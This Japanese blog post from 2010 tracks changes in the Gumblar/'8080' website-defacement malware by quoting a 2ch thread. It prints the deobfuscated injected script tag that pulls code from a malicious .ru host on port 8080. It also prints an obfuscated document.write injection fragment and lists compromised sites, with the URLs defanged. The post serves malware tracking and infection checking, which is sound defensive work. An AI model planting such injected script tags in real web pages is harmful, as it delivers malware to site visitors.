アナログ
RSS  

また改竄コードが変わった2010/01/29 00:17

[WARNING] 8080 が攻撃手順を変更か? - UnderForge of Lackで伝えられている通り、改竄コードがまた変わりました。
検索に引っかかりにくい(絞り込みにくい)ので自力じゃ見つけられなかったです。

【Gumblar/GENO】Web改竄ウイルス総合スレ3【8080】- 2ch.net
19 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/28(木) 21:31:37
直近の要点だけまとめてみた
----------
■Exceptionが「/*・・・*/」無しの「DEBUG」に絶賛進化中。
※最新型は前スレ925氏が「DEBUG」と命名。

■あばすと、かすぺ、農怒は「DEBUG」の検体提出済。
※他の提出状況はしらん(報告待ち中)

改竄
難読化を解除すると
<script src=http://skyrock-com.domaintools.com.google-pl.superhighest●ru:8080/xinhuanet.com/xinhuanet.com/att.net/rbc.ru/google.com/></script>

やれやれです。

<追記>
71 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/29(金) 11:54:57
>>68
DEBUGじゃない...

;document.write('<scr'+'ipt src=h'+'ttp://'+Xiabbjepv1.replace(/Widcfpac5ixzc/g, '8080')+'></scr'+'ipt>');} } catch(Xixc9uyr ) {}
http://apopo●apparelarc-xml●org/z1z00712/

72 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/29(金) 13:09:27
>>71
再改竄
park5●wakwak●com/~izushichi/mikura/index●html
ここは「.ru:Bxj118lelf/」になってる。

.ru:XXXXの部分は
何らかの法則、又はランダムで生成してるような希ガス

昨日のDEBUGは本当にDEBUGだったのか・・・

73 名前:名無しさん@お腹いっぱい。[sage] 投稿日:2010/01/29(金) 13:55:42
あーmegaidもDEBUGもランダムになっちまったか…
        *'``・* 。
        |     `*。
       ,。∩      *
      + (´・ω・`) *。+゚ もうどうにでもな~れ
      `*。 ヽ、  つ *゚*
       `・+。*・' ゚⊃ +゚
       ☆   ∪~ 。*゚
</追記>

えっと、Gumblarとガンブラー (Update)の感染チェック部分を手直ししました。

コメント

_ 通りがかりのPira ― 2010/01/31 18:06

よく言った!! 情報なんて取捨選択。自分で解析して有益・有害判断すればいいことです。じゃなきゃインターネッツ(藁)なんてやってられない。ぼうげんキニシナーイ。

_ puppet ― 2010/01/31 18:23

ひょっとして
http://puppet.asablo.jp/blog/2010/01/31/4849425
へのコメントでしたか?

情報源が一つ減りそうな勢いなんで、本当、虫の居所が悪いです。orz

コメントをどうぞ

※メールアドレスとURLの入力は必須ではありません。 入力されたメールアドレスは記事に反映されず、ブログの管理者のみが参照できます。

※投稿には管理者が設定した質問に答える必要があります。

名前:
メールアドレス:
URL:
次の質問に答えてください:
スパムがウザイので合い言葉を入れるようにしました。山と言えば川だろJK


コメント:

トラックバック

このエントリのトラックバックURL: http://puppet.asablo.jp/blog/2010/01/29/4842055/tb

※なお、送られたトラックバックはブログの管理者が確認するまで公開されません。